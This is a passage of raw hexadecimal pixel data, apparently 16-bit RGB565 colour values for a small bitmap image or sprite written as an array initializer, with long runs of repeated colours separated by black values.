0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
